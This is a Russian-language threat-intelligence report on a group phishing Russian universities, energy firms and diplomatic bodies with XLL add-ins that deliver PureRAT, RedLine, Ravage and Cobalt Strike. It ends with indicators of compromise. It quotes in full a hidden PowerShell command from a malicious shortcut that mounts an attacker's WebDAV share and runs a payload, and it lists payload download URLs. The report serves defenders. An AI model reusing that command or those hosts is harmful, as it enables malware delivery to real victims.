Вузы и энергетику атакует неизвестная группа, активная минимум с 2024 года

В сентябре 2025 года на GitHub вышел очередной фреймворк для тестирования на проникновение — Ravage, а уже в январе 2026-го злоумышленники начали его использовать. Мы обнаружили «пользователей» фреймворка среди атакующих, которые первоначально не слишком привлекали наше внимание. Другие их инструменты семейств PureRAT и RedLine не выделялись на общем фоне киберугроз и относились к сфере MaaS (вредоносное ПО как услуга, Malware-as-a-Service); по сути их брали в аренду все подряд.

Группа, в арсенале которой засветился Ravage, атаковала российские организации и отличалась большими перерывами в своей активности. Как позже выяснилось, злоумышленники могли затаиться на 3–4 месяца, а затем провести 10 атак за месяц. Более половины атак за последний год пришлось на учебные заведения преимущественно морского и речного профиля. Помимо них среди жертв были энергетические и финансовые компании, а также дипломатические службы.

Проследив за деятельностью злоумышленников, мы выявили их ранее незамеченные атаки, которые стартовали почти два года назад, что позволяет говорить о тщательно маскируемых действиях сформировавшейся группы. Любопытная деталь: в 2024 году в некоторых случаях они тоже использовали инструмент для пентеста, Cobalt Strike.

Схема заражения в 2026 году

В 2026 году атаки начинались через фишинговое письмо с ZIP-архивом, содержащим XLL-файл. Этот файл маскировался под легитимную надстройку для Microsoft Excel. Двойной клик по нему запускал приложение Excel, которое загружало в свой процесс исполняемую DLL-библиотеку, что приводило к запуску вредоносного кода. Тип файла Microsoft Excel XLL Add-In (что можно увидеть на скриншоте ниже) в сочетании со знакомым логотипом Excel создавало впечатление легитимного документа. В нашем случае XLL-файл был собран с помощью открытого фреймворка Excel-DNA, который позволяет писать пользовательские функции, макросы и надстройки для Microsoft Excel на .NET‑языках (C#, VB.NET, F#).

Внутри XLL-файла (смотрите на скриншоте ниже) находится модуль, написанный на C#. Это простейший загрузчик: он скачивает и запускает два исполняемых файла по вшитым в него URL. Адреса ведут на взломанный сайт, на который предварительно были загружены вредоносные файлы (https[://]venera-gimadieva.com/update/putty.exe,
https[://]venera-gimadieva.com/update/ps.exe).

В исполняемом файле загрузчика указан путь к отладочной информации о сборке:
C:\MM\SOFT\XLL — BETA\obj\Release\XLL.pdb.

Putty.exe

По первому адресу скачивается типовой биндер (программа-склейщик разнотипных файлов в один) для упаковки известных бэкдоров и стилеров, таких как Vidar, Lumma, RedLine, StealC. Файл Putty.exe представляет собой самораспаковывающийся CAB-архив (8fdff3870b84533e0c59bcccd3cec9a5), внутри которого находятся разделенные на несколько файлов интерпретатор AutoIt и скрипт для него, а также batch-файл. При запуске архива все файлы распаковываются во временный каталог. Затем выполняется batch-файл, который подготавливает интерпретатор и скрипт, после чего запускает последний.

Скрипт для AutoIt весом 1,5 МБ содержит вредоносную нагрузку в виде зашифрованного исполняемого файла. Скрипт расшифровывает файл, запускает процесс RegAsm.exe и внедряет вредоносную нагрузку в этот процесс. Расшифрованная нагрузка — это бэкдор PureRAT, описанный в одной из наших прошлых статей.

Ps.exe

По второй ссылке скачивается файл Ps.exe. Это небольшая утилита BatToExe, предназначенная для преобразования файлов пакетных скриптов Windows (.bat/.cmd) в самодостаточные исполняемые файлы (.exe). Во время выполнения утилита создает один batch- и один PowerShell-файл, запускает batch-файл, а он в свою очередь — PowerShell-скрипт.

Содержимое batch-файла

Содержимое PowerShell-скрипта

PowerShell-скрипт и есть загрузчик фреймворка Ravage. Несмотря на то что в описании на GitHub Ravage характеризуется как «мощный и гибкий C2-фреймворк», этот инструмент ближе к обычному Remote Access Tool. Фреймворк способен выполнять файловые манипуляции — выгружать, скачивать, копировать и удалять, запускать процессы и выполнять внутри себя PowerShell-скрипты, полученные с C2. Также Ravage может делать скриншоты и выполнять команды на компьютерах локальной сети через SMB или WMI. Все это относится к базовой функциональности Remote Access Tool, а вот получать тикеты, токены, сохраненные пароли, а также создавать скрытые каналы управления внутри зараженной сети инструмент не умеет.

Предыдущие эпизоды

Атаки в сентябре-декабре 2025 года

Использование фреймворка Ravage мы заметили в январе 2026 года. Однако, как мы уже упоминали, кампания началась задолго до этого. Так, в сентябре-декабре 2025 года в распространяемых XLL-файлах схожий загрузчик вместо Ravage скачивал и затем открывал обычный Excel-документ, чаще всего пустой.

Указанный в загрузчике путь к отладочной информации о сборке был немного другим, но все же похожим на тот, который мы видели в последних атаках: C:\SynologyDrive\HYDRA\BLACK\XLL — BETA\obj\Release\XLL.pdb.

Вредоносное ПО скачивалось с того же домена venera-gimadieva.com:
https[://]venera-gimadieva.com/ovp/MacMathematical.exe
https[://]venera-gimadieva.com/ovp/2025.xlsx

Атаки в сентябре 2024 года

Раскрутить цепочку, ведущую к атакам двухлетней давности, помог анализ XLL-файлов, в названии которых использовалась кириллица. Исследуя предполагаемые атаки 2024 года, где фигурировали XLL-файлы с названиями, рассчитанными на русскоязычную аудиторию («Список», «Форма», «Протокол»), мы наткнулись на тот же загрузчик, что и в 2025 году, который доставлял исполняемый файл (стилер RedLine) и Excel-документ (для маскировки). Однако в этих атаках в качестве хостинга вредоносных файлов применялся репозиторий Bitbucket. Цепочка c CAB-маскировкой (CAB-SFX → BATСH → AutoIt) не использовалась, и скачанный стилер был спрятан только с помощью небольшой программы-упаковщика.

Полные пути, по которым скачивались файлы, выглядят следующим образом:
https[://]bitbucket.org/cloud-soft-update/system/downloads/crypted.exe
https[://]bitbucket.org/cloud-soft-update/system/downloads/2024.xlsx

Для создания репозитория на Bitbucket использовался идентификатор
[REDACTED]@gmail.com, а путь к отладочной информации о сборке, указанный в загрузчике, был следующим: C:\Users\Black\source\repos\XLL — BETA\obj\Release\XLL.pdb.

Атаки в июле 2024 года

Летом 2024 года злоумышленники также использовали в фишинговых письмах XLL-файлы, на этот раз с именем «Cписок.xll», и собирали их с помощью открытого фреймворка Excel-DNA. Загрузчик был другой, однако он тоже содержал два адреса для скачивания вредоносных файлов. Второй адрес, как и в кампании сентября 2024 года, указывал на отвлекающий Excel-документ, но функциональность первого адреса отличалась: он вел не на исполняемый файл, а на ZIP-архив. В отличие от трех более свежих кампаний, в загрузчике не использовались методы с именами PUTTY, но совсем без этого имени не обошлось: файл putty.exe использовался в одной из схем по доставке Cobalt Strike, о чем мы расскажем далее.

Используемые в загрузчике адреса на Bitbucket были следующими:
https[://]bitbucket.org/dickroot/root1/downloads/wq.zip,
https[://]bitbucket.org/dickroot/root1/downloads/qwe.xlsx

Для создания репозитория на Bitbucket применялся тот же идентификатор
[REDACTED]@gmail.com.

Путь к отладочной информации о сборке, указанный в загрузчике, отличался от используемого в атаках сентября 2024 года:
c:\xampp\htdocs\dashboard\22janX64\obj\Release\22janX64.pdb.

Именно в июле 2024 года злоумышленники использовали Cobalt Strike — популярный фреймворк, широко используемый в легитимных тестах на проникновение. Его раздавали следующими двумя способами.

1. Список.xll → загрузчик → NSIS → Cobalt Strike. В первом случае загрузчик скачивал с Bitbucket (https[://]bitbucket[.]org/dickroot/root1/downloads/wq.zip) ZIP-архив под названием wq.zip. Уточним, что это не тот ZIP-архив, который скачивался из фишингового письма (изображенный на схеме выше), а другой, подгружаемый загрузчиком на более позднем этапе. В этом архиве был всего один файл, q.exe, который являлся инсталлятором NSIS (Nullsoft Scriptable Install System). В свою очередь инсталлятор NSIS извлекал разделенные на несколько файлов интерпретатор AutoIt и скрипт для него, а также batch-файл по аналогичной схеме с самораспаковывающимся CAB-архивом. В качестве вредоносной нагрузки, зашифрованной в этом скрипте, выступал фреймворк Cobalt Strike.
2. Список.lnk → PowerShell → NSIS → Cobalt Strike. Буквально на следующий день тот же самый NSIS-инсталлятор (a23837debdc8f0e9fce308bff036f18f) применялся этими злоумышленниками в другом сценарии атаки с LNK-файлом.
   

   Содержимое Список.lnk

   Вредоносный LNK распространялся в ZIP-архиве под именем «Список.lnk». При запуске ярлыка с помощью интерпретатора PowerShell выполнялась следующая команда:

   "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nologo -noninteractive -windowstyle hidden -c "net use j: '\\reputation-good.online\webdav\'"; start-sleep -seconds 1; \\reputation-good.online\webdav\putty.exe

   1	"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nologo -noninteractive -windowstyle hidden -c "net use j: '\\reputation-good.online\webdav\'"; start-sleep -seconds 1; \\reputation-good.online\webdav\putty.exe

   Обычно злоумышленники скачивают вредоносную нагрузку при помощи PowerShell по HTTP/HTTPS, но в данном случае они применили команду
   net use j: '\\reputation-good.online\webdav\', то есть подключили пользователю сетевой диск J:, который обращался к удаленному серверу \\reputation-good.online\webdav\. С этого удаленного сервера и запускался файл putty.exe, который и был инсталлятором NSIS, описанным выше.

Необычные корреляции

Можно заметить, что злоумышленники регулярно использовали имя putty в своих файлах. Возможно, это было сделано в честь популярного клиента PuTTY для различных протоколов удаленного доступа или по другим соображениям.

Январь 2026 года по настоящее время
— putty — название вредоносного файла (https[://]venera-gimadieva.com/update/putty.exe), который скачивала жертва.
—  В загрузчике использовались методы с именами PUTTY, LaunchPUTTY, StartPUTTY.

Декабрь 2025 года
—  В загрузчике использовались методы с именами PUTTY, LaunchPUTTY.

Сентябрь 2024 года
—  В загрузчике использовались методы с именами PUTTY, LaunchPUTTY.

Июль 2024 года
—  Файл putty.exe, исполняемый в командной строке, является NSIS-инсталлятором.

Среди других общих индикаторов стоит выделить следующие:

• одинаковый домен для скачивания вредоносной нагрузки venera-gimadieva[.]com в 2026 и 2025 годах;
• похожий путь к отладочной информации в последних трех случаях (-BETA\obj\Release\XLL.pdb);
• применение одинакового адреса электронной почты при создании репозитория в Bitbucket в кампаниях сентября 2024 и июля 2024 года ([REDACTED]@gmail.com).

Жертвы

Как мы упоминали выше, эта группа совершает атаки крайне редко. За последний год более 50% ее атак пришлось на образовательные учреждения, из которых около 80% специализируется на подготовке кадров для морского и речного транспорта, рыбохозяйственной отрасли и других сфер, связанных с водными ресурсами. Помимо образовательных учреждений, атаки затронули энергетический сектор, дипломатические миссии, органы государственной власти и финансовые организации. Интересный факт: для атаки на финансовые организации использовались XLL-файлы с англоязычными именами компаний, в частности такими:

Cutoutll Tools Limited.xll 
OSHUN IMPEX GENERAL TRADING LLC.xll

Возможно, подобные файлы рассылались на адреса, предназначенные для взаимодействия с иностранными контрагентами.

Индикаторы компрометации

Имена XLL-файлов из вредоносных вложений
Cutoutll Tools Limited.xll
OSHUN IMPEX GENERAL TRADING LLC.xll
ГБУ РМЭ Информсреда — 1.xll
Форма 2.xll
Форма 4.xll
2026.01.28 исх.25.xll
Валидация_информационных_моделей_в_ENTSOE.xll
Список.xll
Список (обновленный).xll
Список 1.xll
Список номеров.xll
Протокол.xll
Представление_январь_2026.xll
Список товаров для проценки.xll

URL, используемые в загрузчике из XLL-файлов
https://venera-gimadieva[.]com/ovp/MacMathematical.exe
https://venera-gimadieva[.]com/vpo/OgEnrolled.exe
https://venera-gimadieva[.]com/update/putty.exe
https://venera-gimadieva[.]com/update/ps.exe
https://venera-gimadieva[.]com/update/2025.xlsx
https://bitbucket[.]org/linktodevice/system/downloads/met.exe
https://bitbucket[.]org/linktodevice/system/downloads/putty.exe
https://bitbucket[.]org/linktodevice/system/downloads/2024.xlsx
https://bitbucket[.]org/cloud-soft-update/system/downloads/crypted.exe
https://bitbucket[.]org/cloud-soft-update/system/downloads/2024.xlsx
https://bitbucket[.]org/dickroot/root1/downloads/wq.zip
https://bitbucket[.]org/dickroot/root1/downloads/qwe.xlsx
https://sys-update[.]space/update/puty.exe
https://sys-update[.]space/update/ps.exe

Ravage C2
system-update-cloud[.]xyz

Cobalt Strike C2
fender-shop.online

PureRAT C2
system-update-cloud[.]store
64.20.56[.]185
45.14.245[.]145

RedLine C2
77.91.123[.]17
host-update[.]online

XLL MD5
030FE4D168B3E183C14F767AD92E3BB3
037D5E11858AC713F960B6C1844AB1F8
2616E71DE3D8640A397F69A880E71466
2C968FC3599850BBC3BC8F5F89C4123F
2CCD6098E573C19CB499FA0FC44C9986
39FA33189F98D1C34CE4A610FAFE4F8D
3B1B74DAF04B6A50D488F67895F7A900
3F9A789561C35A4C8E6D2E1DA19463B9
7C986070AD8A80457A94BF9F82A423B8
8B842C9C7985340BAE70B0A75F994E95
9ACDAEA04384F688EF05C5A4DF3ED663
A344C1A11397F9271CD364E913791E9F
B786E3F735C06A37F86238D1AE1EBA7C
EDD1868CE809A69E14E548DF9C04B426
F6AE71990BD322C259AB6CA9A71EABF7

Ravage MD5
46EAFCCB15D5DC35CE311BD5588DFAE5
0A08A49CDB4E0744FED45EBECA12BE59

PureRAT MD5
E338483286E6FCA0AAF17BC2F012DC1A
8FDFF3870B84533E0C59BCCCD3CEC9A5

Cobalt Strike MD5
A23837DEBDC8F0E9FCE308BFF036F18F

RedLine MD5
2085FED60E06F05A63704994C3FF06A0